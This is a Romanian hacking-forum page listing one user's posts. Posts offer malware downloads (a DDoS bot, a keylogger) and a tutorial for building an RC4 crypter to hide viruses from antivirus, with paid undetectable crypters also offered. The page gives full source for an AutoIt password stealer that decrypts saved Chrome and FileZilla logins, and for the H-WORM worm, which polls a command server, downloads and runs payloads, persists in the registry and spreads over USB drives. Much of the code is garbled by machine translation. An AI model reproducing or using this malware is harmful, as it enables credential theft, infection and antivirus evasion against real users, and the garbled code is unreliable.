
io.kent
Active Members-
Posts
2325 -
Joined
-
Last visited
-
Days Won
21
Everything posted by io.kent
-
download : XenocodeRCE.rar Enjoy
-
TokyoMode daca esti atent cred ca intelegi bine, sau probabil e acceptabil de inteles..
-
versiunea vip https://www.damballa.com/IMDDOS/ scan : Date 2013-06-28 20:54:26 (GMT 1) File name black-exe File size 3636224 bytes MD5 hash 970486c106f10ccfb8ab1c40c1913cf3 SHA1 hash b9ec1445af5e44ca7c927273517f971691b8ac17 Detection rate: 1 on 14 (7%) Status: INFECTED 970486c106f10ccfb8ab1c40c1913cf3 Antivirus Scan Report - Powered by NoVirusThanks.org download : Download IMddos.rar from Sendspace.com - send big files the easy way
-
as vrea sa punem o ora sa ne intalnim pe chat sau mess, nu conteaza, sa discutam, si sa punem mentalitatea la contributie, puneti o data, si sper sa fie seara, ca am job, in timpul zilei nu pot fi prezent.. sa se faca 2 ,3 , grupurari si proiecte frumoase bine gandite, ca stiu ca se poate si avem useri capabilii, pentru a realiza ceva frumos.. Astept raspuns...
-
cum sa-ti faci propriul tau crypter in visual basic.net
io.kent replied to io.kent's topic in Tutoriale in romana
trimite-mi pm, cu ce vrei si ce optiuni sa aibe, si ajungem la o intelegere... -
cum sa-ti faci propriul tau crypter in visual basic.net
io.kent replied to io.kent's topic in Tutoriale in romana
Ai vrea sa fie fud ? pune pretul si ai si fud, nui problema.. -
cum sa-ti faci propriul tau crypter in visual basic.net
io.kent replied to io.kent's topic in Tutoriale in romana
nu este greu, o sa incerc sa fac unu cu o versiune actualizabina, dar mai trebuie muncit la el, + am sa fac si un video... functii se pot adauga cate vrei asta depinde de fiecare, ceea ce vrea sa faca crypterul sau, in rest important este sa nu fie foarte detectabil.. sper sa ajute pe cei ce vor sa isi faca cate 1 crypter.. -
Azi va explic cum sa faceti un crypter simplu si folositor, cu care ascundeti tot felul de virusi, sau asa mai departe.. Incepem... Destul de usor, pentru a creea un proiect pentru windows... Forms Application, inainte de toate aveti nevoie de versiunea Frameworks 2.0. Public Class Form1 aici scriem asa, Imports System.Text dupa Public Class Form1 trebuie sa mai scriem inca 2 lini StubPath Dim, binpath As String Const FileSplit = "# @ by io.kent" dupa aia scriem stub privat end stub si scriem asa, Dim openstub As New OpenFileDialog If openstub.ShowDialog = Windows.Forms.DialogResult.OK Then TextBox1.Text = openstub.FileName StubPath = openstub.FileName TextBox1.Enabled = False Else : Exit Sub End If Acum vom trece la formularul de editor ?i apoi dublu-clic pe butonul Bin meu, inca odata suntem in editor de cod, modificam acesta, in comparatie cu primul buton : codul, Dim openbin As New OpenFileDialog If openbin.ShowDialog = Windows.Forms.DialogResult.OK Then TextBox2.Text = openbin.FileName BinPath = openbin.FileName TextBox2.Enabled = False Else : Exit Sub End If ei bine pana aici floare la ureche, acum incepe distractia, ?i anume punerea in aplicare baza Builder functionalitatea) facem un dublu click pe butonul 3 ( salvare)sau memorare.. in forma noastra, Daca persoana face clic pe OK incepe magia (adica criptare a fi?ierelor sale). Scrie ca acest cod : Dim filein, filename, stub As String Dim OutFile As New SaveFileDialog If OutFile.ShowDialog = Windows.Forms.DialogResult.OK Then filename = OutFile.FileName FileOpen(1, BinPath, OpenMode.Binary, OpenAccess.Read, OpenShare.Default) filein = Space(LOF(1)) FileGet(1, filein) FileClose(1) FileOpen(1, StubPath, OpenMode.Binary, OpenAccess.Read, OpenShare.Default) stub = Space(LOF(1)) FileGet(1, stub) FileClose(1) FileOpen(1, filename, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(1, stub & filesplit & rc4(filein, "MadebyMrGr33n")) FileClose(1) MsgBox("File Crypted") Else : Exit Sub End If daca va da un error sau ceva e pentru ca lipseste RC4, Aceasta caracteristica cripteaza binarele noastre Acum vom scrie (copy-paste intre liniile End Sub End Class): Public Shared Function rc4(ByVal message As String, ByVal password As String) As String Dim i As Integer = 0 Dim j As Integer = 0 Dim cipher As New StringBuilder Dim returnCipher As String = String.Empty Dim sbox As Integer() = New Integer(256) {} Dim key As Integer() = New Integer(256) {} Dim intLength As Integer = password.Length Dim a As Integer = 0 While a <= 255 Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0)) key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp) sbox(a) = a System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1) End While Dim x As Integer = 0 Dim b As Integer = 0 While b <= 255 x = (x + sbox( + key() Mod 256 Dim tempSwap As Integer = sbox( sbox( = sbox(x) sbox(x) = tempSwap System.Math.Max(System.Threading.Interlocked.Increment(, b - 1) End While a = 1 While a <= message.Length Dim itmp As Integer = 0 i = (i + 1) Mod 256 j = (j + sbox(i)) Mod 256 itmp = sbox(i) sbox(i) = sbox(j) sbox(j) = itmp Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256) Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0) itmp = Asc(ctmp) Dim cipherby As Integer = itmp Xor k cipher.Append(Chr(cipherby)) System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1) End While returnCipher = cipher.ToString cipher.Length = 0 Return returnCipher End Function ne intoarcem acum la stub, stub-ul trebuie sa fie capabil sa sa faca la fel ca si clientul doar ca o face invers, pe baza binara, cifrata facerea unui nou ( proiect ) valorile sunt la fel ca clientul in continuare dam dublu click pe Public Class Form1 si pune codul asta : Imports System.Text intre linii Public Class Form1 si Sub Form Private ... Const filesplit = "#Crypter By io.kent@" intre linii private Form Sub .. End Sub ?i scrie cod: On Error Resume Next Dim TPath As String = System.IO.Path.GetTempPath Dim file1, filezb4(), filezafter As String FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared) file1 = Space(LOF(1)) FileGet(1, file1) FileClose(1) filezb4 = Split(file1, filesplit) filezafter = rc4(filezb4(1), " MadebyMrGr33n") FileOpen(5, TPath & "Crypted.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(5, filezafter) FileClose(5) Me.Close() End iara avem probleme cu RC4 care acum scrie intre linii End Sub End Class Imports System.Text Public Shared Function rc4(ByVal message As String, ByVal password As String) As String Dim i As Integer = 0 Dim j As Integer = 0 Dim cipher As New StringBuilder Dim returnCipher As String = String.Empty Dim sbox As Integer() = New Integer(256) {} Dim key As Integer() = New Integer(256) {} Dim intLength As Integer = password.Length Dim a As Integer = 0 While a <= 255 Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0)) key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp) sbox(a) = a System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1) End While Dim x As Integer = 0 Dim b As Integer = 0 While b <= 255 x = (x + sbox( + key() Mod 256 Dim tempSwap As Integer = sbox( sbox( = sbox(x) sbox(x) = tempSwap System.Math.Max(System.Threading.Interlocked.Increment(, b - 1) End While a = 1 While a <= message.Length Dim itmp As Integer = 0 i = (i + 1) Mod 256 j = (j + sbox(i)) Mod 256 itmp = sbox(i) sbox(i) = sbox(j) sbox(j) = itmp Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256) Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0) itmp = Asc(ctmp) Dim cipherby As Integer = itmp Xor k cipher.Append(Chr(cipherby)) System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1) End While returnCipher = cipher.ToString cipher.Length = 0 Return returnCipher End Function si asa stub-ul este terminat acum apasam tasta f5 pentru a salva proiectul .. Restul depinde de voi, aceste crypter nu este foarte detectat, dar nici nu este fud: Bafta...
-
scan : Date 2013-06-28 16:47:02 (GMT 1) File name reflect-logger-v3-exe File size 711168 bytes MD5 hash 6cfec5cbd154d8a29bed0f0e4c42f1a3 SHA1 hash a787ddf49de608d895cffea05968781fcd4daab1 Detection rate: 4 on 14 (29%) Status: INFECTED 6cfec5cbd154d8a29bed0f0e4c42f1a3 Antivirus Scan Report - Powered by NoVirusThanks.org download : http://w111022.blob1.ge.tt/streams/6NcE0cj/Reflect%20Logger%20v3.exe?sig=-T_LSPRhr7C9-GscvDcgfbxTyKFB7oCgeGw&type=download
-
vroiai in rusa?
-
Cod (AutoIt): # Comments-start + + + + + + + + + + + + Autoit stealer + + + + + + + + + Scriere de njq8; # Comments-end # Include <sqlite.au3> # Include <sqlite.dll.au3> $ File = @ SCRIPTDIR & "\ passwords.txt" dac? FileExists ( $ file ) , apoi FileDelete ( $ file ) $ File_handle = FileOpen ( $ file , 1 ) dac? $ file_handle <> - 1 atunci FileWrite ( $ file_handle , NOIP ( ) ?i Chrome ( ) & FileZilla ( ) ) fileflush ( $ file_handle ) FileClose ( $ file_handle ) endif func NOIP ( ) $ Usr = RegRead ( "HKEY_LOCAL_MACHINE \ Software \ vitalwer KS \ Duc" , "username" ) dac? $ usr = "" , apoi reveni "" $ Pwd = RegRead ( "HKEY_LOCAL_MACHINE \ Software \ vitalwer KS \ Duc" , "parola" ) reveni "URL: Http :/ / nu-ip.com /" & @ CRLF & "usr:" & $ usr & @ CRLF & "handicap (base64):" & $ pwd & @ CRLF & @ CRLF endfunc func FileZilla ( ) locale PWDs $ , $ h , $ Fn = envget ( "AppData" ) & "\ FileZilla \ recentservers.xml" dac? FileExists ( $ Fn ) = false apoi întoarce "" $ H = FileOpen ( $ Fn , 0 ) dac? $ H = - 1 , atunci întoarce "" $ Host = "" $ Port = 21 Usr $ = "" Pass $ = "" în timp ce adev?rata $ Line = FileReadLine ( $ H ) dac? @ error = - 1 , atunci exitloop dac? StringInStr ( $ line , "<gazd?>" ) , apoi Usr $ = "" Pass $ = "" $ Port = 21 $ Host = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 ) $ Host = StringMid ( $ host , StringInStr ( $ host , ">" ) + 1 ) endif dac? StringInStr ( $ line , "<port>" ) , apoi $ Port = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 ) $ Port = StringMid ( $ portul , StringInStr ( $ portul , ">" ) + 1 ) endif dac? StringInStr ( $ line , "<utilizator>" ) , apoi $ Usr = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 ) $ Usr = StringMid ( $ usr , StringInStr ( $ usr , ">" ) + 1 ) endif dac? StringInStr ( $ line , "<pass>" ) , apoi Pass $ = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 ) $ Pass = StringMid ( $ Pass , StringInStr ( $ Pass , ">" ) + 1 ) endif dac? StringInStr ( $ line , "</ server>" ) , apoi $ PWDs = $ PWDs ?i "URL: FTP :/ /" & $ host & ":" & $ portul & @ CRLF & "usr:" & $ usr & @ CRLF & "PWD:" & $ Pass & @ CRLF & @ CRLF endif îndrepta reveni $ PWDs endfunc func Chrome ( ) locale $ q , $ R , $ PWDs , $ Fn = envget ( "localappdata" ) & "\ Google \ Chrome \ Utilizator \ \ implicite de conectare de date" dac? FileExists ( $ Fn ) = false apoi întoarce "" _sqlite_startup ( ) _sqlite_open ( $ Fn ) _sqlite_query ( - 1 , "Select * de login," , $ q ) în timp ce _sqlite_fetchdata ( $ q , $ R ) = 0 $ PWDs = $ PWDs ?i "URL:" & $ R [ 0 ] & @ CRLF & "usr:" & $ R [ 3 ] & @ CRLF & "PWD:" & uncryptrdppassword ( $ R [ 5 ] ) & @ CRLF & @ CRLF îndrepta _sqlite_close ( ) _sqlite_shutdown ( ) reveni $ PWDs endfunc func uncryptrdppassword ( $ BIN ) , Aceast? func?ie din >> http://www.autoitscript.com/forum/to...a/ # entry695769 locale const $ cryptprotect_ui_forbidden = 0x1 locale const $ data_blob = "int; ptr" locale $ passstr = dllstructcreate ( "byte [1024]" ) locale $ datain = dllstructcreate ( $ data_blob ) locale $ Dataout = dllstructcreate ( $ data_blob ) $ Pwdescription = 'PSW " Pwdhash $ = "" dllstructsetdata ( $ Dataout , 1 , 0 ) dllstructsetdata ( $ Dataout , 2 , 0 ) dllstructsetdata ( $ passstr , 1 , $ BIN ) dllstructsetdata ( $ datain , 2 , dllstructgetptr ( $ passstr , 1 ) ) dllstructsetdata ( $ datain , 1 , binarylen ( $ BIN ) ) $ Retur = DllCall ( "crypt32.dll" , "int" , "CryptUnprotectData" , _ "Ptr" , dllstructgetptr ( $ datain ) , _ "Ptr" , 0 , _ "Ptr" , 0 , _ "Ptr" , 0 , _ "Ptr" , 0 , _ "DWORD" , $ cryptprotect_ui_forbidden , _ "Ptr" , dllstructgetptr ( $ Dataout ) ) în cazul în care eroarea @ apoi întoarce "" $ Len = dllstructgetdata ( $ Dataout , 1 ) $ Pwdhash = ptr ( dllstructgetdata ( $ Dataout , 2 ) ) $ Pwdhash = dllstructcreate ( "byte [" & $ Len si "]" , $ pwdhash ) reveni BinaryToString ( dllstructgetdata ( $ pwdhash , 1 ) , 4 ) endfunc
-
Cod (AutoIt): # Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = H-WORM ÎN LUME (AutoIt versiune) \ = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = CODER: Houdini (C) - WWW.DEV-POINT.COM Limbaj compilat: AutoIt V 3.0 VIZITA OWR mai multe informa?ii sau Contacta?i-m? în: SKYPE: Houdini-FX # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = # Include <PROCESS.AU3> # Include <WINAPI.AU3> # Include <FILE.AU3> # NOTRAYICON # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = CONFIG WORM # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = LOCAL $ IP_ADDR = "127.0.0.1" LOCAL $ port = "40055" LOCAL $ install_dir = @ TEMPDIR # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = VARIABLE WORM # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = LOCAL $ CIMV2 = OBJGET ("WINMGMTS:!. {IMPERSONATIONLEVEL = juca rolul} \ \ \ ROOT \ CIMV2") LOCAL $ SPLITTER = "<|>" LOCAL $ WORM_VERSION = "H-WORM (AutoIt)" LOCAL $ USB_SPREADING = "false" LOCAL $ SERVER_CMD LOCAL $ W_METUX LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = COD WORM: START # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = DAC? NU @ COMPILATA EXIT ATUNCI __INIT () While True __USB_SPREADING () __STARTUP () $ SERVER_CMD = __ POST ("I_AM_READY") $ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ separator, 1) SELECT CASE $ SERVER_CMD [1] = "Uninstall" CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF) __USB_SPREADING ($ SERVER_CMD [1]) REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME) REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME) FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME) EXIT CASE $ SERVER_CMD [1] = "UPDATE" CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF) _WINAPI_CLOSEHANDLE ($ W_METUX) __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE") EXIT CASE $ SERVER_CMD [1] = "Trimite" CONSOLEWRITE ("TRIMITE" & $ SERVER_CMD [2] & @ CRLF) __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2]) CASE $ SERVER_CMD [1] = "EXCECUTE" CONSOLEWRITE ("EXCECUTE" & SERVER_CMD $ [2] & @ CRLF) __RUNA3X ($ SERVER_CMD [2]) ENDSELECT SLEEP (5000) Merge încet FUNC __ init () _PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT) IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ install_dir & "\" & @ SCRIPTNAME)) ATUNCI If ($ linie_cmd [0]> 0) ?i ($ linie_cmd [1] = "/ UPDATE") ATUNCI DO PANA FILECOPY (@ SCRIPTFULLPATH, $ install_dir & "\" & @ SCRIPTNAME, 1 +8) = 1 ELSE FILECOPY (@ SCRIPTFULLPATH, $ install_dir & "\" & @ SCRIPTNAME, 1 +8) ENDIF ShellExecute ($ install_dir & "\" & @ SCRIPTNAME) EXIT ENDIF __ONE_INSTANCE () __IS_USB_SPREADING () ENDFUNC FUNC __ DAWONLOAD_AND_EXEC ($ file, $ RUN = TRUE, $ CMD = "") LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT LOCAL $ FGET_HANDEL _PATHSPLIT ($ File, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT) $ Rezultat = __ POST ("IS-TRIMITERE" & $ Splitter & $ file, "stream") $ FGET_HANDEL = FileOpen (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT, 16 +2 +8) FILEWRITE ($ FGET_HANDEL, $ rezultat) FILECLOSE ($ FGET_HANDEL) Daca $ apoi executa?i ShellExecute (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT, $ CMD) RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT ENDFUNC FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "") LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT LOCAL $ FGET_HANDEL _PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT) FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8) $ A3X_DATA = __ POST ("IS-TRIMITERE" & $ Splitter & $ A3X_FILE, "stream") $ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3x [" & BINARYLEN ($ A3X_DATA) ?i "]") DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3x", $ A3X_DATA) $ H_RESOURCE = DLLCALL Daca $ H_RESOURCE [0] <> 0 atunci DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT)) DLLCALL ("Kernel32.dll", "bool", "EndUpdateResource", "descurca", $ H_RESOURCE [0], "bool", FALSE) ShellExecute (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD) ENDIF ENDFUNC FUNC POST __ ($ data, $ type = "text") LOCAL $ rezultat HTTPSETUSERAGENT (__INFORMATIOM ()) $ Rezultat = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATE, 1) Daca $ type = "text" returna STRINGUPPER (BINARYTOSTRING ($ rezultat)) RETURN $ rezultat ENDFUNC FUNC STARTUP __ () REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME, "REG_SZ", CHR (34) & $ install_dir & "\" & @ SCRIPTNAME & CHR (34)) REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME, "REG_SZ", CHR (34) & $ install_dir & "\" & @ SCRIPTNAME & CHR (34)) FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME) ENDFUNC FUNC __ INFORMATIOM () LOCAL $ inforamtion = "" $ Inforamtion = $ inforamtion & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER $ Inforamtion = $ inforamtion & @ ComputerName & $ SPLITTER $ Inforamtion = $ inforamtion & nume de utilizator @ & $ SPLITTER $ Inforamtion = $ inforamtion & OPERATING_SYSTEM () __ & $ SPLITTER $ Inforamtion = $ inforamtion & $ WORM_VERSION & $ SPLITTER $ Inforamtion = $ inforamtion & SECURITY_CENTER () __ & $ SPLITTER $ Inforamtion = $ inforamtion & $ USB_SPREADING & $ SPLITTER $ Inforamtion = $ inforamtion & __ TOP_WINDOWS () Întoarcere $ inforamtion ENDFUNC FUNC __ OPERATING_SYSTEM () LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM") LOCAL $ OS_CAPTION = "" Pentru $ operare în $ OPERATINGSYSTEM $ OS_CAPTION = $ OS.CAPTION & "." EXITLOOP NEXT Întoarcere $ OS_CAPTION ENDFUNC FUNC __ SECURITY_CENTER () LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM") LOCAL $ OS_VERSION LOCAL $ SECURITY_CENTER = "SecurityCenter" Pentru $ operare în $ OPERATINGSYSTEM $ OS_VERSION = NUM?RUL ($ OS.VERSION) NEXT Daca $ OS_VERSION> 6 atunci $ SECURITY_CENTER = "SECURITYCENTER2" $ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS:. \ \ \ ROOT \" & $ SECURITY_CENTER) LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT") LOCAL $ ANTI_VIRUSE = "" LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT") LOCAL $ FIRE_WALL = "" Pentru $ OBJ_ANTI_VIRUS în $ COL_ANTI_VIRUS $ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME si "." NEXT Pentru $ OBJ_FIRE_WALL în $ COL_FIRE_WALL $ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME si "." NEXT Daca $ ANTI_VIRUSE = "" atunci $ ANTI_VIRUSE = "NU AV" Daca $ FIRE_WALL = "" atunci $ FIRE_WALL = "NO FW" Întoarcere $ ANTI_VIRUSE & "<|>" & FIRE_WALL $ ENDFUNC FUNC __ TOP_WINDOWS () LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ()) LOCAL $ WINTOP_PID, $ WINTOP_PNAME _WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID) $ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID) Întoarcere $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME si "]" ENDFUNC FUNC __ ONE_INSTANCE () $ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME si "_" & $ WORM_VERSION) IF (@ EROARE) sau (_WINAPI_GETLASTERROR () = 183) apoi ie?i?i ENDFUNC FUNC __ USB_SPREADING ($ type = "Instalare") $ DISK = DRIVEGETDRIVE ("Removable") DAC? NU ISARRAY ($ disc) apoi s? se întoarc? Pentru $ I = 1 la $ DISK [0] PASUL 1 IF DRIVESTATUS ($ DISK [$ i]) = "READY", atunci IFOLDERS __ ($ DISK [$ i] & "\", $ TIP) NEXT ENDFUNC FUNC IS_USB_SPREADING __ () LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".") $ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "") Daca $ USB_SPREADING = "", apoi $ USB_SPREADING = "false" IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) atunci $ USB_SPREADING = "true" REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING) ENDIF ENDFUNC IFOLDERS __ func ($ ROOT, $ type = "Install", $ nume = TRUE, $ CALLBACK = "__CALLBACK") LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0 $ ENUM_ARRAY [0] = $ ROOT DO $ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *") DO $ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH) DAC? NU @ eroare ?i $ FIND_NAME <> "", apoi ReDim $ ENUM_ARRAY [UBound ($ ENUM_ARRAY) +1] $ ENUM_ARRAY [UBound ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME CALL ($ apel invers, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TIP) $ L_COUNTER + = 1 ENDIF PÂN? @ eroare sau $ FIND_NAME = "" FILECLOSE ($ H_SEARCH) Dac? primele $ = TRUE ?i $ G_COUNTER = 0 atunci EXITLOOP $ G_COUNTER + = 1 PÂN? LA $ G_COUNTER> $ L_COUNTER Întoarcere $ ENUM_ARRAY ENDFUNC FUNC CALLBACK __ ($ PATH, $ TIP) LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ argumente _PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT) Daca $ type = "Install", apoi IF (STRINGUPPER ($ SZEXT) = ". LNK") sau (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) apoi s? se întoarc? FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE) FILESETATTRIB ($ SZDRIVE & $ SZDIR & SCRIPTNAME @, "+ HS") $ Argumente = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& Start" si STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT" DAC? NU STRINGINSTR (FILEGETATTRIB ($ PATH), "D"), atunci $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \" & $ SZEXT, "") & "\ DEFAULTICON", "") ELSE $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \ de \ DEFAULTICON", "") ENDIF $ SZICON = STRINGSPLIT ($ SZICON, "") If ($ SZICON [0] = 1) ?i (STRINGINSTR ($ SZICON [1], "% 1") = 0), apoi FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente , "", $ SZICON [1], "", "", @ SW_HIDE) If ($ SZICON [0] = 1) ?i (STRINGINSTR ($ SZICON [1], "% 1")> 0) ATUNCI FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente , "", $ PATH, "", "", @ SW_HIDE) If ($ SZICON [0] = 2) ATUNCI FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE) FILESETATTRIB ($ PATH, "+ HS") ENDIF Daca $ type = "Uninstall" ATUNCI IF (STRINGUPPER ($ SZEXT) = ". LNK") sau (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) ATUNCI FILEDELETE ($ PATH) FILESETATTRIB ($ PATH, "-SA") ENDIF ENDFUNC FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0) LOCAL $ RET = DLLCALL ('Kernel32.dll "," PTR "," CreateMutexW "," PTR ", DLLSTRUCTGETPTR ($ TSECURITY)," INT ", $ FINITIAL," WSTR ", $ SMUTEX) IF (@ ERORI) SAU (NU $ RET [0]) ATUNCI RETURN SetError (1, 0, 0) ENDIF Întoarcere $ RET [0] ENDFUNC
-
